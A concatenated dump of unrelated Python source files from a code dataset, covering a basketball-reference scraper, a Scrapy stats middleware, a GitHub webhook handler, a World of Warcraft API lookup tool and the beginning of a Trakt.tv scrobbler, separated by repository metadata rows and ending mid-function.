base_url = 'http://www.basketball-reference.com/players/{}/'
return self.get(base_url.format(initial.lower()))
def player_page(self, pid):
'''
Gets page for individual player
Args:
pid(str): 'smithje01'
Returns:
str: HTML of page
'''
base_url = 'http://www.basketball-reference.com/players/{}/{}.html'
return self.get(base_url.format(pid[0].lower(), pid))
class Parser():
'''
'''
def __init__(self,**kwargs):
'''
'''
logging.getLogger(__name__).addHandler(logging.NullHandler())
def players(self, content):
'''
Parses page of players with same last initial (A, B, C, etc.)
Args:
content: HTML string
Returns:
list of dict
'''
results = []
soup = BeautifulSoup(content, 'lxml')
for row in soup.find('table', {'id': 'players'}).find('tbody').find_all('tr'):
player = dict([(td['data-stat'], td.text) for td in row.find_all('td')])
player['source_player_id'] = row.find('th').get('data-append-csv')
player['source_player_name'] = row.find('th').find('a').text
th = row.find('th')
if th.find('strong'):
player['active'] = True
else:
player['active'] = False
if player.get('pos'):
player['source_player_position'] = player['pos']
player.pop('pos', None)
results.append(player)
return results
def player_page(self, content, pid):
'''
Parses player page
Args:
content: HTML string
Returns:
dict: source, source_player_id, source_player_name,
source_player_position, source_player_dob,
source_player_team_code, source_player_team_name
'''
player = {'source': 'bref', 'source_player_id': pid}
soup = BeautifulSoup(content, 'lxml')
#source_player_name
h1 = soup.find('h1', {'itemprop': 'name'})
if h1:
player['source_player_name'] = h1.text
#source_player_position
positions = ['Shooting Guard', 'Power Forward and Small Forward', 'Small Forward', 'Center', 'Point Guard',
'Center and Power Forward', 'Power Forward and Center', 'Shooting Guard and Small Forward',
'Power Forward', 'Small Forward and Shooting Guard', 'Point Guard and Shooting Guard',
'Guard', 'Forward']
div = soup.find('div', {'itemtype': 'https://schema.org/Person'})
for p in div.find_all('p'):
if 'Position:' in p.text:
for line in [l.strip() for l in p.text.split('\n')]:
if line in positions:
player['source_player_position'] = line
elif 'Team:' in p.text:
a = p.find('a')
if a:
player['source_player_team_code'] = a['href'].split('/')[2]
player['source_player_team_name'] = a.text
# source_player_dob
bd = soup.find('span', {'id': 'necro-birth'})
if bd:
player['source_player_dob'] = bd.attrs.get('data-birth')
return player
class Agent(object):
'''
Performs script-like tasks using NBA.com API
'''
def __init__(self, db=None, cache_name='bbref-agent', cookies=None, table_names=None):
'''
Args:
cache_name (str): for scraper cache_name
cookies: cookie jar
db (NBAPostgres): instance
table_names (dict): Database table names
'''
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.scraper = BBRefScraper(cache_name=cache_name, cookies=cookies)
self.parser = BBRefParser()
self.db = db
self.bbref_players = {}
def match_gamelog_player(self, gamelog_player):
'''
Matches player from nbacom_gamelog with bbref player
Args:
gamelog_player (dict):
Returns:
dict
'''
# gamelog player
# {'PLAYER_ID': 2544, 'PLAYER_NAME': 'LeBron James',
# 'TEAM_ABBREVIATION': 'CLE', 'TEAM_NAME': 'Cleveland Cavaliers'}
#
# bbref player
# {'source': 'bref', source_player_dob': '1992-03-23', 'source_player_id': 'irvinky01',
# 'source_player_name': 'Kyrie Irving', 'source_player_position': 'Point Guard',
# 'source_player_team_code': 'BOS', 'source_player_team_name': 'Boston Celtics'}
# bbref_players caches pages for each letter
# helpful if doing more than a few players
fn, ln = gamelog_player['PLAYER_NAME'].split()
letter = ln[0].lower()
if not self.bbref_players.get(letter):
content = self.scraper.players(letter)
self.bbref_players[letter] = self.parser.players(content)
# step one: find all players with the same name
matches = [p for p in self.bbref_players.get(letter) if
p['source_player_name'] == gamelog_player['PLAYER_NAME']]
# if no matches, then look for individual player page on bbref
# newer players may not have been added to the letter index page ('a', 'b', 'c')
if not matches:
pid = bbref_player_id(fn, ln)
logging.info('trying player page for {}'.format(pid))
content = self.scraper.player_page(pid)
bbref_player = self.parser.player_page(content, pid)
if bbref_player:
return bbref_player
# if there is only 1 match, then assume it is the right player
# need to get the player page, which has the full position
elif matches and len(matches) == 1:
logging.info('add_gamelog_player: found 1 match')
pid = matches[0].get('source_player_id')
content = self.scraper.player_page(pid)
bbref_player = self.parser.player_page(content, pid)
if bbref_player:
return bbref_player
# if more than 1 match, then try to match team as well
# very unlikely to have duplicate
elif matches and len(matches) > 1:
logging.info('add_gamelog_player: found >1 match')
for match in matches:
pn = gamelog_player['PLAYER_NAME']
pt = gamelog_player['TEAM_NAME']
for match in matches:
bbrefn = match['source_player_name']
bbreft = match['source_player_team_name']
if (pn == bbrefn and pt == bbreft):
pid = match.get('source_player_id')
content = self.scraper.player_page(pid)
bbref_player = self.parser.player_page(content, pid)
if bbref_player:
return bbref_player
else:
logging.info('no match for {}'.format(gamelog_player['PLAYER_NAME']))
return None
def match_nbacom_player(self, nbacom_player):
'''
Matches nbacom player (player v2015 resource) with bbref player
Args:
nbacom_player (dict):
Returns:
dict
'''
# nbacom player
# {'birthdate': datetime.datetime(1993, 8, 1, 0, 0), 'country': 'Spain',
# 'display_first_last': 'Alex Abrines', 'draft_number': 32, 'draft_round': 2, 'draft_year': 2013,
# 'first_name': 'Alex', 'from_year': 2016, 'height': 42, 'jersey': 8,
# 'last_affiliation': 'Spain/Spain', 'last_name': 'Abrines', 'nbacom_player_id': 203518,
# 'nbacom_position': 'G', 'school': '', 'weight': 190}
#
# bbref player
# {'source': 'bref', source_player_dob': '1992-03-23', 'source_player_id': 'irvinky01',
# 'source_player_name': 'Kyrie Irving', 'source_player_position': 'Point Guard',
# 'source_player_team_code': 'BOS', 'source_player_team_name': 'Boston Celtics'}
# bbref_players caches pages for each letter
# helpful if doing more than a few players
letter = nbacom_player['last_name'][0].lower()
if not self.bbref_players.get(letter):
content = self.scraper.players(letter)
self.bbref_players[letter] = self.parser.players(content)
# step one: find all players with the same name
matches = [p for p in self.bbref_players.get(letter) if
p['source_player_name'] == nbacom_player.get('display_first_last')]
# if no matches, then look for individual player page on bbref
# newer players may not have been added to the letter index page ('a', 'b', 'c')
if not matches:
pid = bbref_player_id(nbacom_player['first_name'], nbacom_player['last_name'])
logging.info('trying player page for {}'.format(pid))
content = self.scraper.player_page(pid)
bbref_player = self.parser.player_page(content, pid)
if bbref_player:
return bbref_player
# if there is only 1 match, then assume it is the right player
# need to get the player page, which has the full position
elif matches and len(matches) == 1:
logging.info('add_gamelog_player: found 1 match')
pid = matches[0].get('source_player_id')
content = self.scraper.player_page(pid)
bbref_player = self.parser.player_page(content, pid)
if bbref_player:
return bbref_player
# if more than 1 match, then try to match team as well
# very unlikely to have duplicate
elif matches and len(matches) > 1:
logging.info('add_gamelog_player: found >1 match')
for match in matches:
dob = match['source_player_dob']
if dob == datetostr(nbacom_player.get('birthdate'), fmt='nba'):
return match
else:
logging.info('no match for {}'.format(nbacom_player['display_first_last']))
return None
def update_player_xref(self):
'''
Updates player_xref table with bbref players
Args:
None
Returns:
None
'''
nbacom_players_d = nbacom_xref(self.db)
nbacom_players_d2 = nbacom_xref(self.db, with_pos=True)
wanted = ['source', 'source_player_id', 'source_player_name', 'source_player_position']
# loop through each 'letter' page of players
for letter in ascii_lowercase:
if letter == 'x':
continue
logging.info('starting {}'.format(letter))
content = self.scraper.players(letter)
for p in self.parser.players(content):
# try direct name match first
# if no match, then use fuzzy matching
# if 1 match, then add to database
# if more then 1 result, then consider positions as well
match = nbacom_players_d.get(p['source_player_name'].lower())
if not match:
# try fuzzy matching
# TODO: implement fuzzy match
if p.get('active'):
logging.error('could not match {}'.format(p))
elif len(match) == 1:
toins = {k: v for k, v in p.items() if k in wanted}
toins['source'] = 'bbref'
toins['nbacom_player_id'] = match[0]['nbacom_player_id']
toins['source_player_dob'] = datetime.datetime.strftime(parse(p['birth_date']),
'%Y-%m-%d')
self.db.insert_dict(toins, 'extra_misc.player_xref')
else:
key = '{}_{}'.format(p['source_player_name'], p['source_player_position']).lower()
match2 = nbacom_players_d2.get(key)
if not match2:
if p.get('active'):
match3 = fuzzy_match(key, list(nbacom_players_d2.keys()))
if match3:
try:
toins = {k: v for k, v in p.items() if k in wanted}
toins['source'] = 'bbref'
toins['nbacom_player_id'] = nbacom_players_d2.get(match3).get('nbacom_player_id')
toins['source_player_dob'] = datetime.datetime.strftime(parse(p['birth_date']),
'%Y-%m-%d')
self.db.insert_dict(toins, 'extra_misc.player_xref')
except:
logging.error('could not match {}'.format(p))
else:
logging.error('could not match {}'.format(p))
elif match2 and len(match2) == 1:
toins = {k: v for k, v in p.items() if k in wanted}
toins['source'] = 'bbref'
toins['nbacom_player_id'] = match2[0]['nbacom_player_id']
toins['source_player_dob'] = datetime.datetime.strftime(parse(p['birth_date']),
'%Y-%m-%d')
self.db.insert_dict(toins, 'extra_misc.player_xref')
else:
if p.get('active'):
logging.error('could not match {}'.format(p))
'''
TODO: can match DOB for multiple players
more accurate than fuzzy match
wanted = ['source_player_id', 'source_player_position', 'source_player_name']
for m in tomatch:
dob = parse(m.get('birth_date')).date()
nbap = nbadb2.select_scalar(q.format(m['source_player_name'].split()[-1] , dob))
if nbap:
toins = {k:v for k,v in m.items() if k in wanted}
toins['source'] = 'bbref'
toins['nbacom_player_id'] = nbap
toins['source_player_dob'] = m['birth_date']
nbadb2._insert_dict(toins, 'extra_misc.player_xref')
'''
if __name__ == '__main__':
pass
| mit | -6,796,014,073,940,704,000 | 38.917098 | 117 | 0.524208 | false | 4.002078 | false | false | false |
moijes12/oh-mainline | vendor/packages/scrapy/scrapy/contrib/downloadermiddleware/stats.py | 19 | 1370 | from scrapy.exceptions import NotConfigured
from scrapy.utils.request import request_httprepr
from scrapy.utils.response import response_httprepr
from scrapy.stats import stats
from scrapy.conf import settings
class DownloaderStats(object):
def __init__(self):
if not settings.getbool('DOWNLOADER_STATS'):
raise NotConfigured
def process_request(self, request, spider):
stats.inc_value('downloader/request_count', spider=spider)
stats.inc_value('downloader/request_method_count/%s' % request.method, spider=spider)
reqlen = len(request_httprepr(request))
stats.inc_value('downloader/request_bytes', reqlen, spider=spider)
def process_response(self, request, response, spider):
stats.inc_value('downloader/response_count', spider=spider)
stats.inc_value('downloader/response_status_count/%s' % response.status, spider=spider)
reslen = len(response_httprepr(response))
stats.inc_value('downloader/response_bytes', reslen, spider=spider)
return response
def process_exception(self, request, exception, spider):
ex_class = "%s.%s" % (exception.__class__.__module__, exception.__class__.__name__)
stats.inc_value('downloader/exception_count', spider=spider)
stats.inc_value('downloader/exception_type_count/%s' % ex_class, spider=spider)
| agpl-3.0 | 1,570,326,803,235,319,800 | 46.241379 | 95 | 0.705109 | false | 3.971014 | false | false | false |
codex-bot/github | github/events/repository.py | 1 | 1573 | from data_types.organization import Organization
from data_types.repository import Repository
from data_types.user import User
from .base import EventBase
class EventRepository(EventBase):
def __init__(self, sdk):
super(EventRepository, self).__init__(sdk)
self.hook = None
self.repository = None
self.sender = None
"""
RepositoryEvent
Triggered when someone creates a new repository in your organization.
https://docs.github.com/en/developers/webhooks-and-events/webhook-events-and-payloads#repository
"""
async def process(self, payload, chat):
"""
Processes Repository event
:param payload: JSON object with payload
:param chat: current chat object
:return:
"""
self.sdk.log("Repository event payload taken {}".format(payload))
try:
self.repository = Repository(payload['repository'])
self.organization = Organization(payload['organization'])
self.sender = User(payload['sender'])
except Exception as e:
self.sdk.log('Cannot process RepositoryEvent payload because of {}'.format(e))
await self.send(
chat['chat'],
'🦍 <a href=\"{}\">{}</a> created a repository <a href=\"{}\">{}</a> in the {} organization'.format(
self.sender.html_url,
self.sender.login,
self.repository.html_url,
self.repository.full_name,
self.organization.login),
'HTML'
)
| mit | 820,249,232,561,150,100 | 29.784314 | 111 | 0.601911 | false | 4.563953 | false | false | false |
ivanvza/api-wow-python | wow_api.py | 1 | 17489 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
import sys
import datetime
import optparse
import urllib2
from BeautifulSoup import BeautifulSoup
import textwrap
options = optparse.OptionParser(usage='%prog -r <Realm> -c <Character Name> --cs <options>', description='WoW API functions (https://github.com/blizzard/api-wow-docs) - OneSockThief')
#Functions
options_functions = optparse.OptionGroup(options, 'Supported functions')
options_functions.add_option('--cs', '--charactersearch', action="store_true", dest='charactersearch', help='Character search / Information')
options_functions.add_option('--ah', '--auctionsearch', action="store_true", dest='auctionsearch', help='Auction house search')
options.add_option_group(options_functions)
#Required parameters for other functions
options.add_option('-r', '--realm', type='string', dest='realm', help='Realm to search/filter by')
options.add_option("-c", "--character", type='string', dest="character", help="Search for a character by name")
#Smaller functions, for character details
character_group = optparse.OptionGroup(options, 'Detailed character information to use with Character Search (--cs)')
character_group.add_option("--guild", action="store_true", dest="guild", help="Guild information")
character_group.add_option("--items", action="store_true", dest="items", help="Current equipped items")
character_group.add_option("--mounts", action="store_true", dest="mounts", help="Current mounts collected")
character_group.add_option("--pvp", action="store_true", help="PvP stats")
character_group.add_option("--quests", action="store_true", dest="quests", help="Current active quests")
character_group.add_option("--reputation", action="store_true", dest="reputation", help="Current reputation level of appropriate factions")
character_group.add_option("--stats", action="store_true", dest="stats", help="Currect character stats #pewpew")
character_group.add_option("--talents", action="store_true", dest="talents", help="Current talent progres")
character_group.add_option("--audit", action="store_true", dest="audit", help="Audit the character")
options.add_option_group(character_group)
base_url = "http://eu.battle.net/api/wow"
def check_sub_character_options():
requests = []
if opts.guild:
requests.append('guild')
if opts.items:
requests.append('items')
if opts.mounts:
requests.append('mounts')
if opts.pvp:
requests.append('pvp')
if opts.quests:
requests.append('quests')
if opts.reputation:
requests.append('reputation')
if opts.stats:
requests.append('stats')
if opts.talents:
requests.append('talents')
if opts.audit:
requests.append('audit')
return requests
def query_api(url):
try:
s = requests.get(url).json()
pass
except Exception:
#raise e
pass
try:
if s["reason"]:
print "ERROR: " + s["reason"]
sys.stop()
except:
return s
def auction_house(realm):
print "THIS SECTION IS BROKEN, EU AUCTION HOUSE IS MIA!"
return
url = base_url + "/api/wow/auction/data/" + realm
s = query_api(url)
print s
def character_male_female(n):
if n == 0:
return "Male"
if n == 1:
return "Female"
def character_class(n):
url = base_url + "/data/character/classes"
classes = query_api(url)
for cclass in classes['classes']:
if cclass['id'] == n:
return cclass['name']
def character_race(n):
url = base_url + "/data/character/races"
races = query_api(url)
for craces in races['races']:
if craces['id'] == n:
return craces['name']
def character_search(name, realm):
fields = check_sub_character_options()
url = base_url + "/character"
print "\nCharacter search for " + name + " on " + realm + "\n"
url = url + "/" + realm.title()
url = url + "/" + name.title()
#See if any sub fields are queried
if fields:
fields = ",".join(fields)
url = url + "?fields=" + fields
#Try and request the data from the API
s = query_api(url)
parse_char_info(s)
#PRINT EXTRA INFO AT THE BOTTOM:
if opts.guild:
character_guild(s)
if opts.items:
character_items(s)
if opts.mounts:
character_mounts(s)
if opts.pvp:
character_pvp(s)
if opts.quests:
character_quests(s)
if opts.reputation:
character_reputation(s)
if opts.stats:
character_stats(s)
if opts.talents:
character_talents(s)
if opts.audit:
character_audit(s)
def parse_char_info(char_api_data):
print "Realm: " + str(char_api_data["realm"])
print "Name: " + str(char_api_data["name"])
print "Level: " + str(char_api_data["level"])
print "Class: " + character_class(char_api_data["class"])
print "Race: " + character_race(char_api_data["race"])
print "Calc Class: " + str(char_api_data["calcClass"])
print "Gender: " + character_male_female(char_api_data["gender"])
print "Achievement Points: " + str(char_api_data["achievementPoints"])
print "Total Honorable Kills: " + str(char_api_data["totalHonorableKills"])
print "Battlegroup: " + str(char_api_data["battlegroup"])
print "Last Modified: " + str(datetime.datetime.fromtimestamp(char_api_data["lastModified"]/1000).strftime('%Y-%m-%d %H:%M:%S'))
print "Thumbnail: http://eu.battle.net/static-render/eu/" + str(char_api_data["thumbnail"])
def character_reputation(s):
print "\n\tReputation:"
names = []
for long_names in s["reputation"]:
if (long_names["value"] != 0) and (long_names["standing"] > 0):
names.append(long_names["name"])
longest = len(max(names, key=len))
for reps in s["reputation"]:
minimum = str(reps["value"])
for x in xrange(3,5):
if len(minimum) < x:
minimum = minimum + " "
if (reps["value"] != 0) and (reps["standing"] > 0):
bar_length = 25
bar = reps["name"]
calc = round(float(reps["value"]) / float(reps["max"]) * bar_length)
empty = bar_length - calc #This is the length of the BAR
calculate_empty_spaces = longest - len(bar)
line = u'█'
bar = bar + " "*calculate_empty_spaces + " (lvl:" + str(reps["standing"]) + ") " + minimum + " |" + line*int(calc) + " "*int(empty) + "| " + str(reps["max"])
print "\t" + bar
def character_guild(s):
print "\n\tGuild:"
guild_info = s["guild"]
print "\tName: " + guild_info["name"]
print "\tTotal Achievement Points: " + str(guild_info["achievementPoints"])
print "\tTotal Members: " + str(guild_info["members"])
def character_pvp(s):
twovtwo = s["pvp"]["brackets"]["ARENA_BRACKET_2v2"]
threevthree = s["pvp"]["brackets"]["ARENA_BRACKET_3v3"]
fivevfive = s["pvp"]["brackets"]["ARENA_BRACKET_5v5"]
RBG = s["pvp"]["brackets"]["ARENA_BRACKET_RBG"]
print "\n\tPvP Ratings:"
print "\t2v2:"
print "\t\tRating: " + str(twovtwo["rating"])
print "\t\tSeason Won: " + str(twovtwo["seasonWon"])
print "\t\tSeason Played: " + str(twovtwo["seasonPlayed"])
print "\t\tWeekly Won: " + str(twovtwo["weeklyWon"])
print "\t\tWeekly Played " + str(twovtwo["weeklyPlayed"])
print "\t3v3: "
print "\t\tRating: " + str(threevthree["rating"])
print "\t\tSeason Won: " + str(threevthree["seasonWon"])
print "\t\tSeason Played: " + str(threevthree["seasonPlayed"])
print "\t\tWeekly Won: " + str(threevthree["weeklyWon"])
print "\t\tWeekly Played " + str(threevthree["weeklyPlayed"])
print "\t5v5: "
print "\t\tRating: " + str(fivevfive["rating"])
print "\t\tSeason Won: " + str(fivevfive["seasonWon"])
print "\t\tSeason Played: " + str(fivevfive["seasonPlayed"])
print "\t\tWeekly Won: " + str(fivevfive["weeklyWon"])
print "\t\tWeekly Played " + str(fivevfive["weeklyPlayed"])
print "\tRated BG: "
print "\t\tRating: " + str(RBG["rating"])
print "\t\tSeason Won: " + str(RBG["seasonWon"])
print "\t\tSeason Played: " + str(RBG["seasonPlayed"])
print "\t\tWeekly Won: " + str(RBG["weeklyWon"])
print "\t\tWeekly Played " + str(RBG["weeklyPlayed"])
def character_items(s):
all_items = s["items"]
print "\n\tItems:"
print "\tHead: " + str(all_items["head"]["name"]) + " ilvl: " + str(all_items["head"]["itemLevel"])
print "\tShoulders: " + str(all_items["shoulder"]["name"]) + " ilvl: " + str(all_items["shoulder"]["itemLevel"])
print "\tNeck: " + str(all_items["neck"]["name"]) + " ilvl: " + str(all_items["neck"]["itemLevel"])
print "\tBack: " + str(all_items["back"]["name"]) + " ilvl: " + str(all_items["back"]["itemLevel"])
print "\tFeet: " + str(all_items["feet"]["name"]) + " ilvl: " + str(all_items["feet"]["itemLevel"])
print "\tWrist: " + str(all_items["wrist"]["name"]) + " ilvl: " + str(all_items["wrist"]["itemLevel"])
print "\tMain Hand: " + str(all_items["mainHand"]["name"]) + " ilvl: " + str(all_items["mainHand"]["itemLevel"])
print "\tOff Hand:" + str(all_items["head"]["name"]) + " ilvl: " + str(all_items["head"]["itemLevel"])
print "\tHands: " + str(all_items["hands"]["name"]) + " ilvl: " + str(all_items["hands"]["itemLevel"])
print "\tLegs: " + str(all_items["legs"]["name"]) + " ilvl: " + str(all_items["legs"]["itemLevel"])
print "\tWaist: " + str(all_items["waist"]["name"]) + " ilvl: " + str(all_items["waist"]["itemLevel"])
print "\tFinger 1: " + str(all_items["finger1"]["name"]) + " ilvl: " + str(all_items["finger1"]["itemLevel"])
print "\tFinger 2: " + str(all_items["finger2"]["name"]) + " ilvl: " + str(all_items["finger2"]["itemLevel"])
print "\tTrinket 1: " + str(all_items["trinket1"]["name"]) + " ilvl: " + str(all_items["trinket1"]["itemLevel"])
print "\tTrinket 2: " + str(all_items["trinket2"]["name"]) + " ilvl: " + str(all_items["trinket2"]["itemLevel"])
print "\tAverage ilvl: " + str(all_items["averageItemLevel"])
print "\tAverage ilvl Equipped: " + str(all_items["averageItemLevelEquipped"])
def character_mounts(s):
mounts = s["mounts"]["collected"]
print "\n\tMounts Collected:"
for mount in mounts:
print "\t" + mount["name"]
def character_quests(s):
quests = s["quests"]
print "\n\tQuests:"
quest_continue = query_yes_no("\tThis can take some time, do you want to continue?", None)
if quest_continue == "yes":
for quest in quests:
quest_url = "http://www.wowhead.com/quest=" + str(quest)
#Lets do something for the user, and warn him this might take long, because were grabbing the title etc.
soup = BeautifulSoup(urllib2.urlopen(quest_url))
quest_name = soup.title.string.split('-')
print "\t" + quest_name[0] + "(http://www.wowhead.com/quest=" + str(quest) + ")"
else:
return
def character_stats(s):
stats = s["stats"]
longest_stat_name = []
for long_name in stats:
longest_stat_name.append(long_name)
longest_stat_name = len(max(longest_stat_name, key=len))
spacing = 30
spacing = spacing - longest_stat_name
print "\n\tStats:"
print "\t------Attributes------\r"
print "\tHealth: " + str(stats["health"])
print "\tStrength: " + str(stats["str"])
print "\tAgility: " + str(stats["agi"])
print "\tIntellect: " + str(stats["int"])
print "\tStamina: " + str(stats["sta"])
print "\tPowertype: " + str(stats["powerType"])
print "\tPower: " + str(stats["power"])
print "\tAttack Power: " + str(stats["attackPower"])
print "\t------Attack------\r"
print "\tMain hand dps: " + str(stats["mainHandDps"])
print "\tMain Hand DMG Max: " + str(stats["mainHandDmgMax"])
print "\tMain hand DMG Min: " + str(stats["mainHandDmgMin"])
print "\tMainhand Speed: " + str(stats["mainHandSpeed"])
print "\tOff-Hand DPS: " + str(stats["offHandDps"])
print "\tOff-Hand DMG Max: " + str(stats["offHandDmgMax"])
print "\tOff-Hand DMG Min: " + str(stats["offHandDmgMin"])
print "\tOff-Hand Speed: " + str(stats["offHandSpeed"])
print "\t------Spell------\r"
print "\tSpell Power: " + str(stats["spellPower"])
print "\tSpell Crit: " + str(stats["spellCrit"])
print "\tSpell Penetration: " + str(stats["spellPen"])
print "\tMana Regen in Combat: " + str(stats["mana5Combat"])
print "\tMana Regen outside Combat: " + str(stats["mana5"])
print "\t------Defence------\r"
print "\tArmor: " + str(stats["armor"])
print "\tDodge: " + str(stats["dodge"]) + "%"
print "\tParry: " + str(stats["parry"]) + "%"
print "\tBlock: " + str(stats["block"]) + "%"
print "\t------Enhancements------\r"
print "\tCrit: " + str(stats["crit"]) + "%"
print "\tHaste: " + str(stats["haste"]) + "%"
print "\tMastery: " + str(stats["mastery"]) + "%"
print "\tSpirit: " + str(stats["spr"])
print "\tBonus Armor: " + str(stats["bonusArmor"])
print "\tMultistrike: " + str(stats["multistrike"]) + "%"
print "\tVersatility: " + str(stats["versatility"]) + "%"
print "\tLeech: " + str(stats["leech"]) + "%"
print "\tAvoidance Rating: " + str(stats["avoidanceRating"]) + "%"
def character_talents(s):
print "\n\tTalents:"
for talent in s["talents"]:
try:
if talent["selected"]:
print "\tActive Talent:"
except:
print "\n\tSecondary Talent:"
for tier in talent["talents"]:
print "\tTier " + str(tier["tier"]+1)
print "\t\tName: " + tier["spell"]["name"]
print "\t\tCast Time: " + tier["spell"]["castTime"]
try:
if tier["spell"]["powerCost"]:
print "\t\tPower Cost: " + tier["spell"]["powerCost"]
except:
pass
spell_description = "\t\tDescription: " + tier["spell"]["description"].replace("\n","")
print "\n\t\t".join(textwrap.wrap(spell_description, 64))
def character_audit(s):
print "\n\tCharacter Audit:"
if s["audit"]["missingLeatherworkerEnchants"] != {}:
print "\tLeather Worker Enchants Missing:"
for missing_leatherworker_enchant in s["audit"]["missingLeatherworkerEnchants"]:
print "\t\t" + missingLeatherworkerEnchants
if s["audit"]["emptyGlyphSlots"] > 0:
print "\tTotal Empty Glyph Slots: " + str(s["audit"]["emptyGlyphSlots"])
if s["audit"]["itemsWithEmptySockets"] != {}:
print "\tItems With Empty Sockets:"
for empty_sockets in s["audit"]["itemsWithEmptySockets"]:
print "\t\tItem: " + empty_sockets
if s["audit"]["missingExtraSockets"] != {}:
print "\tItems Missing Extra Sockets:"
for missing_sockets in s["audit"]["missingExtraSockets"]:
print "\t\tItem: " + missing_sockets
if s["audit"]["emptySockets"] > 0:
print "\tTotal Empty Sockets: " + str(s["audit"]["emptySockets"])
if s["audit"]["recommendedBeltBuckle"] != {}:
buckle_description = "Description: " + s["audit"]["recommendedBeltBuckle"]["itemSpells"][0]["spell"]["description"].replace("\n","")
print "\tRecommended Belt Buckle: "
print "\t\t" + str(s["audit"]["recommendedBeltBuckle"]["itemSpells"][0]["spell"]["name"]) + " (" + buckle_description + ")"
if s["audit"]["unenchantedItems"] != {}:
print "\tUnenchanted Items:"
for unenchanted_item in s["audit"]["unenchantedItems"]:
print "\t\tItem: " + unenchanted_item
if s["audit"]["numberOfIssues"] > 0:
print "\tNumber of Issues: " + str(s["audit"]["numberOfIssues"])
if s["audit"]["noSpec"]:
print "No Spec Detected!"
def query_yes_no(question, default="yes"):
valid = {"yes":"yes", "y":"yes", "ye":"yes",
"no":"no", "n":"no"}
if default == None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("\tinvalid default answer: '%s'" % default)
while 1:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return default
elif choice in valid.keys():
return valid[choice]
else:
sys.stdout.write("\tPlease respond with 'yes' or 'no' "\
"(or 'y' or 'n').\n")
#MAIN FUNCTION
def main():
print " __ __ __ __ .__ "
print "/ \ / \____/ \ / \ _____ ______ |__|"
print "\ \/\/ / _ \ \/\/ / ______ \__ \ \____ \| |"
print " \ ( <_> ) / /_____/ / __ \| |_> > |"
print " \__/\ / \____/ \__/\ / python (____ / __/|__|"
print " \/ \/ \/|__| "
print " - @viljoenivan"
global opts
opts, args = options.parse_args()
if len(sys.argv) == 1:
options.print_help()
return
#Character stuff
if opts.charactersearch:
if opts.character and opts.realm:
character_search(opts.character, opts.realm)
#Auction House
if opts.auctionsearch:
if opts.realm:
auction_house(opts.realm)
if __name__ == '__main__':
main()
| mit | 4,502,594,035,306,280,400 | 42.827068 | 183 | 0.583919 | false | 3.216296 | false | false | false |
cristianmiranda/plex-trakt-scrobbler | src/helper/trakt.py | 1 | 6672 | import json
import logging
import os
import socket
import urllib
import urllib2
import urlparse
class Trakt(object):
CLIENT_ID = 'aa9cd9a641758c5c20f2076e657a199925a6d2409dcddd0c8737b0dc1e90b6b0'
CLIENT_SECRET = 'c6a1b1d563a521b4b126efd8847cd18d2a5533a702997f6401dd6e8f48c83faa'
USER_AGENT = 'plex-trakt-scrobbler'
def __init__(self, cfg):
self.logger = logging.getLogger(__name__)
self.cfg = cfg
'''
Common API methods
'''
def get_session(self):
if os.path.exists(self.cfg.get('plex-trakt-scrobbler', 'session')):
sessfp = open(self.cfg.get('plex-trakt-scrobbler', 'session'), 'r')
session = sessfp.read().strip()
sessfp.close()
return session
def _do_trakt_post(self, url, data):
f = urllib2.Request(url)
f.add_header('User-Agent', self.USER_AGENT)
try:
res = urllib2.urlopen(f, data)
return json.load(res)
except urllib2.URLError, e:
self.logger.error('Unable to submit post data {url} - {error}'.format(
url=url, error=e))
raise
def _get_auth_infos(self):
args = {
'client_id': self.CLIENT_ID
}
url = urlparse.urlunparse(('https',
'api-v2launch.trakt.tv',
'/oauth/device/code', '', '', ''))
res = self._do_trakt_post(url, urllib.urlencode(args))
return res
def _get_access_token(self, code):
args = {
'client_id': self.CLIENT_ID,
'client_secret': self.CLIENT_SECRET,
'code': code,
}
url = urlparse.urlunparse(('https',
'api-v2launch.trakt.tv',
'/oauth/device/token', '', '', ''))
res = self._do_trakt_post(url, urllib.urlencode(args))
return res
def trakt_auth(self):
print '== Requesting trakt.tv auth =='
auth_infos = self._get_auth_infos()
accepted = 'n'
print '\nPlease do the following to authorize the scrobbler:\n\n1/ Connect on {auth_url}\n2/ Enter the code: {code}'.format(
auth_url=auth_infos['verification_url'], code=auth_infos['user_code'])
while accepted.lower() == 'n':
print
accepted = raw_input('Have you authorized me? [y/N] :')
try:
access_token_infos = self._get_access_token(auth_infos['device_code'])
except urllib2.HTTPError, e:
self.logger.error('Unable to send authorization request {error}'.format(error=e))
return False
if not access_token_infos['refresh_token']:
print access_token_infos['message']
return
token = access_token_infos['access_token']
refresh_token = access_token_infos['refresh_token']
fp = open(self.cfg.get('plex-trakt-scrobbler', 'session'), 'w')
fp.write(token)
fp.close()
fp = open(self.cfg.get('plex-trakt-scrobbler', 'session') + '_refresh', 'w')
fp.write(refresh_token)
fp.close()
self.logger.info('Trak TV authorization successful.')
def _do_trakt_auth_post(self, url, data):
try:
session = self.get_session()
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + session,
'trakt-api-version': '2',
'trakt-api-key': self.CLIENT_ID
}
# timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
request = urllib2.Request(url, data, headers)
response = urllib2.urlopen(request).read()
self.logger.info('Response: {0}'.format(response))
return response
except urllib2.HTTPError as e:
self.logger.error('Unable to submit post data {url} - {error}'.format(url=url, error=e.reason))
raise
def _do_trakt_auth_get(self, url):
return self._do_trakt_auth_post(url, None)
'''
Trakt TV API methods
'''
def get_media(self, media_id, source):
self.logger.info('Getting Media information with {source} id: {media_id} from trak.tv.'
.format(source=source, media_id=media_id))
url = urlparse.urlunparse(('https', 'api-v2launch.trakt.tv', '/search', '', '', ''))
url += '?id_type={source}&id={media_id}'.format(source=source, media_id=media_id)
try:
return self._do_trakt_auth_get(url)
except:
return None
def get_movie(self, imdb_id):
return self.get_media(imdb_id, 'imdb')
def get_show(self, tvdb_id):
return self.get_media(tvdb_id, 'tvdb')
def scrobble_show(self, show_name, season_number, episode_number, progress, scrobble_type):
self.logger.info(
'Scrobbling ({scrobble_type}) {show_name} - S{season_number}E{episode_number} - {progress} to trak.tv.'
.format(show_name=show_name, scrobble_type=scrobble_type, season_number=season_number.zfill(2),
episode_number=episode_number.zfill(2), progress=progress))
data = {}
data['show'] = {}
data['show']['title'] = show_name
data['episode'] = {}
